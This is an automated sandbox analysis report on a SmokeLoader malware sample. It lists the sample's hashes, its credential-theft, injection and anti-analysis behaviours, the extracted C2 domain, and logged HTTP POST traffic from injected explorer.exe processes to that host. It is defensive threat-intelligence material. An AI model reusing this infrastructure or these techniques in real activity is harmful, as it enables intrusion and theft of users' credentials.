Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 1RMZ62tUAl.exe

Overview

General Information

Sample Name:1RMZ62tUAl.exe
Analysis ID:524302
MD5:8696a4269e30ddb34a7e0e84629ede03
SHA1:125198e1f636ef118e468145d02e801a3ffe2a97
SHA256:47ec411eab0aa15619f24caa6256ed4ca5cfc695a26f5b71830b53b07c22b05b
Tags:exe
Infos:

Most interesting Screenshot:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if browser processes are running
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to compare user and computer (likely to detect sandboxes)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 1RMZ62tUAl.exe (PID: 316 cmdline: "C:\Users\user\Desktop\1RMZ62tUAl.exe" MD5: 8696A4269E30DDB34A7E0E84629EDE03)
    • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 5732 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 2892 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 4424 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5056 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 3532 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 6052 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6908 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 4760 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6008 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 6528 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 6184 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5824 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 6264 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • favdejf (PID: 6992 cmdline: C:\Users\user\AppData\Roaming\favdejf MD5: 8696A4269E30DDB34A7E0E84629EDE03)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://rsuehfidvdkfvk.top/", "http://rsuehfidvdkfvk.top/"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
      0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
          00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
            Click to see the 8 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://rsuehfidvdkfvk.top/", "http://rsuehfidvdkfvk.top/"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 1RMZ62tUAl.exeVirustotal: Detection: 46%Perma Link
            Multi AV Scanner detection for domain / URLShow sources
            Source: iosoftware.orgVirustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\favdejfReversingLabs: Detection: 55%
            Machine Learning detection for sampleShow sources
            Source: 1RMZ62tUAl.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\favdejfJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E83364 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E83171 StrRChrIW,StrRChrIW,StrRChrIW,StrRChrIW,RtlCompareMemory,CryptUnprotectData,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E83696 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E81289 StrRChrIW,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E8122F lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E811E6 CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E8213A CryptUnprotectData,RtlMoveMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0011118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0011165C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_027D2404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00331EA2 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D126D CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D25A4 CryptBinaryToStringA,CryptBinaryToStringA,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D2799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 31_2_027D1314 lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,
            Source: 1RMZ62tUAl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\1RMZ62tUAl.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
            Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdb source: 1RMZ62tUAl.exe
            Source: Binary string: C:\rorefeb\45\xabev\wok_kedage 44_dehawovexan.pdbP source: 1RMZ62tUAl.exe
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E81EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02E82C81 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001114D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_001113FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1939 wsprintfW,FindFirstFileW,lstrcmpiW,wsprintfW,wsprintfW,wsprintfW,RtlZeroMemory,lstrcat,StrToIntA,PathMatchSpecW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1FFD FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D217C FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_027D1B5B GetTempPathW,lstrcatW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,wsprintfW,CreateFileW,GetFileSize,ReadFile,CloseHandle,DeleteFileW,
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 5.188.88.118 80
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: rsuehfidvdkfvk.top
            Source: C:\Windows\explorer.exeDomain query: iosoftware.org
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://rsuehfidvdkfvk.top/
            Source: Malware configuration extractorURLs: http://rsuehfidvdkfvk.top/
            Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
            Source: Joe Sandbox ViewASN Name: HOSTKEY-USAUS HOSTKEY-USAUS
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oidhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: rsuehfidvdkfvk.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjigjxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: rsuehfidvdkfvk.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrirybsj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: rsuehfidvdkfvk.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmmykkqa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: rsuehfidvdkfvk.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rsuehfidvdkfvk.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: rsuehfidvdkfvk.top
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Nov 2021 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 2c 01 00 00 0d ea ca f4 a9 bc c2 d2 42 81 8e 85 72 87 9b 58 60 8c d3 6c ea b8 55 27 e0 a1 b4 5e b6 34 5e b5 2b 44 fb 30 3b bc 67 5c ce fe b0 25 96 55 51 79 63 d7 60 70 55 2b e3 ef 22 79 35 f6 af 06 12 95 2f 9a 3d 93 4d 37 5a 42 f1 ab b5 95 90 bc f3 c3 36 8c 23 18 ba 54 73 c3 a9 20 6c 2f b2 93 54 fd bf db 73 3f 84 fb f5 e7 00 5e cd 13 22 cd 51 c2 19 3a c0 a2 1b 66 bc 39 14 d0 06 ed a7 6a 57 9d 82 73 7b 99 f4 a1 cf 5e 8d 37 3c bb 78 c7 58 00 b4 b7 52 a3 a1 4a 49 d1 4b 32 99 24 13 48 b6 ea ec 50 f3 a7 cc ce f2 57 ff 4b 29 f0 04 36 62 69 16 61 bb af 08 44 e6 69 bb 3c c3 ea f3 8c 5a 35 b2 fb 1a 3e 11 a4 de 25 42 ea 4b e6 60 89 13 26 de c6 22 17 42 32 ea 7b 8f 78 6e e5 2b ae 19 b3 76 5a 44 4f bb de 21 98 19 01 2f 49 a4 df 10 37 c1 f7 b6 b9 06 b8 50 96 3c 5c 81 9c 7b ee 15 3c f3 52 6c 24 12 fa e8 fe 72 b1 7f 94 17 ef 5d 66 a8 43 f3 b6 0c 51 0d 30 1b 6f a5 59 b4 d8 f8 d1 af 4b 7f f2 2d ad 31 aa eb 9e e5 cf 00 1e 71 06 00 b8 d3 34 d5 03 0f 06 00 0d 00 9c 03 00 00 c9 a6 6d fb 75 e6 cb 32 fd 66 8b 8e 41 26 0b 00 e5 c4 0d 6d 04 5e 5c e7 10 19 f4 25 09 91 e2 11 1d 20 4d 5a 26 d2 b8 dd 32 27 a3 25 c3 34 44 f1 af 41 59 5f 25 4d 9d 3c 3e 34 a2 81 d2 ca d1 51 64 d7 e5 5e 5e 84 51 60 e4 02 3b 29 c7 b1 b2 8f 87 03 6c 8f 65 32 08 3d c1 d2 8b 5b df 28 2c d3 f1 6c 90 9d e7 31 0d 81 8d ef f6 7d 15 a4 5a be 82 97 68 3b 5a 2c 32 cf 42 6b 9b 68 03 76 8b ce 62 87 63 a2 90 83 3d c1 c8 4a 9e d2 2b 50 82 9a 7a 43 69 8e 2d b6 35 4c 79 f6 f9 87 2e 92 c6 68 28 ad 22 17 5b 7a bc a2 04 1f 80 eb cd 89 67 b6 29 35 f2 db b0 f3 01 c1 5d 88 62 d6 3a 43 c4 ea 38 dd 76 40 32 7f 02 83 9d 3d ad c0 ec c8 af 83 82 42 e3 d5 7e 0f 5e 78 42 ff 89 eb 43 dc 87 39 c1 36 23 12 c7 42 2c 69 fc bf 45 d4 4c c2 12 09 5b 97 57 97 46 e3 49 da e1 0a c1 03 f1 ff 65 20 8d 3f 80 d7 45 b8 0f 83 ef 72 31 3a 85 33 e8 47 1e 4c 71 7b 8d db 39 e5 d8 86 94 2c 34 66 51 ad ca 8e ba 45 cd b5 7b f5 12 9b a0 da 2b ed 70 b9 69 f4 93 6d e6 c6 b1 44 d8 34 5e c2 e6 cb f4 e6 48 4f 8e 48 b8 66 56 c0 8a aa 26 e5 de 88 d1 77 10 49 9f 33 b5 35 d9 8d 63 2d c5 39 ea eb 6e c3 26 f9 01 ff 8c 29 4c 14 3e 59 82 64 63 17 bb 76 69 a9 27 3c 0b 0c c1 7b 0c f6 8f 76 b5 1f a3 90 4b 14 1e 92 34 24 7b fe 50 b8 45 c7 88 ff 2d 7e 60 f9 c4 c2 a6 4c 55 30 de 0e 46 76 50 8c 22 e3 5b 72 21 32 24 ee e3 34 65 ab 7c 3e 91 9c 3f 76 e5 77 3c 50 46 9f 59 46 e7 2d c3 cc 7e 32 6c e5 1d 70 61 c2 2b 7b 3c dd 0e c7 55 06 e7 4f 20 40 5a 4f dc 3d c9 23 e3 b0 e6 b7 76 fc 1c 76 46 c6 e8 12 a1 c2 98 ea 86 6e 16 8d b0 67 b5 80 af 65 61 61 5d 7b 82 7c 11 70 32 6d 59 af c0 d8 b6 14 e4 87 fe 1f 14 2d 1b 36 40 c9 53 d0 01 48 c0 c0 18 d0 d2 d4 40 ba a6 f0 e0 65 8a 35 00 fb 16 1c ea 16 43 ff ff da 9e a4 0e 39 cc 8f cc cf 3c 5b e8 e9 f2 7e 9a 1d 89 4e 09 a9 e7 77 b1 1c 33 e7 cc d4 55 79 09 b3 92 6a 6a 7b ef 8c 49 d0 ef 3e af 77 c2 29 c3 61 bf a8 77 6e 8b 9f c4 5a d4 ef
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Nov 2021 09:44:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 43Connection: closeData Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 0c 2c 85 07 1f d1 2c 50 d3 Data Ascii: gs'h],,P
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Nov 2021 09:44:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 46Connection: closeData Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 2c 30 82 06 0a 92 71 1e 98 ef c5 4a Data Ascii: gs'h],0qJ
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Nov 2021 09:45:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 406Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 73 75 65 68 66 69 64 76 64 6b 66 76 6b 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at rsuehfidvdkfvk.top Port 80</address></body></html>
            Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmp, explorer.exe, 00000014.00000002.482205642.00000000011F0000.00000004.00000020.sdmp, explorer.exe, 00000015.00000002.561502388.0000000002BA8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000002.562589266.0000000002BD8000.00000004.00000020.sdmp, explorer.exe, 00000017.00000002.555930517.00000000007E0000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.500674063.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000000.505280148.0000000000EA0000.00000040.00020000.sdmp, explorer.exe, 0000001A.00000000.511253478.0000000000340000.00000040.00020000.sdmp, explorer.exe, 0000001B.00000002.555867484.0000000000760000.00000004.00000020.sdmp, explorer.exe, 0000001D.00000000.525714592.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.555950745.0000000001376000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000002.561863769.0000000002CC8000.00000004.00000020.sdmpString found in binary or memory: http://rsuehfidvdkfvk.top/
            Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmpString found in binary or memory: http://rsuehfidvdkfvk.top/:
            Source: explorer.exe, 00000014.00000002.482205642.00000000011F0000.00000004.00000020.sdmp, explorer.exe, 00000015.00000002.561502388.0000000002BA8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000002.562589266.0000000002BD8000.00000004.00000020.sdmp, explorer.exe, 00000017.00000002.555930517.00000000007E0000.00000004.00000020.sdmp, explorer.exe, 00000018.00000000.500674063.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000000.505280148.0000000000EA0000.00000040.00020000.sdmp, explorer.exe, 00000019.00000002.555816764.0000000000EE8000.00000004.00000020.sdmp, explorer.exe, 0000001A.00000000.511253478.0000000000340000.00000040.00020000.sdmp, explorer.exe, 0000001B.00000002.555867484.0000000000760000.00000004.00000020.sdmp, explorer.exe, 0000001B.00000000.516205138.0000000000600000.00000040.00020000.sdmp, explorer.exe, 0000001D.00000000.525714592.00000000027E0000.00000040.00020000.sdmp, explorer.exe, 0000001E.00000002.555950745.0000000001376000.00000004.00000020.sdmp, explorer.exe, 0000001E.00000000.530597579.0000000001290000.00000040.00020000.sdmp, explorer.exe, 0000001F.00000002.561863769.0000000002CC8000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.535523393.00000000027E0000.00000040.00020000.sdmpString found in binary or memory: http://rsuehfidvdkfvk.top/Mozilla/5.0
            Source: explorer.exe, 00000013.00000002.485190294.0000000003294000.00000004.00000020.sdmpString found in binary or memory: http://rsuehfidvdkfvk.top/application/x-www-form-urlencodedMozilla/5.0
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oidhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: rsuehfidvdkfvk.top
            Source: unknownDNS traffic detected: queries for: rsuehfidvdkfvk.top

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5056, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6052, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6908, type: MEMORYSTR
            Source: 1RMZ62tUAl.exe, 00000001.00000002.357794252.00000000021DA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_027D162B GetKeyboardState,ToUnicode,

            E-Banking Fraud:

            barindex
            Checks if browser processes are runningShow sources
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Sleep, firefox.exe
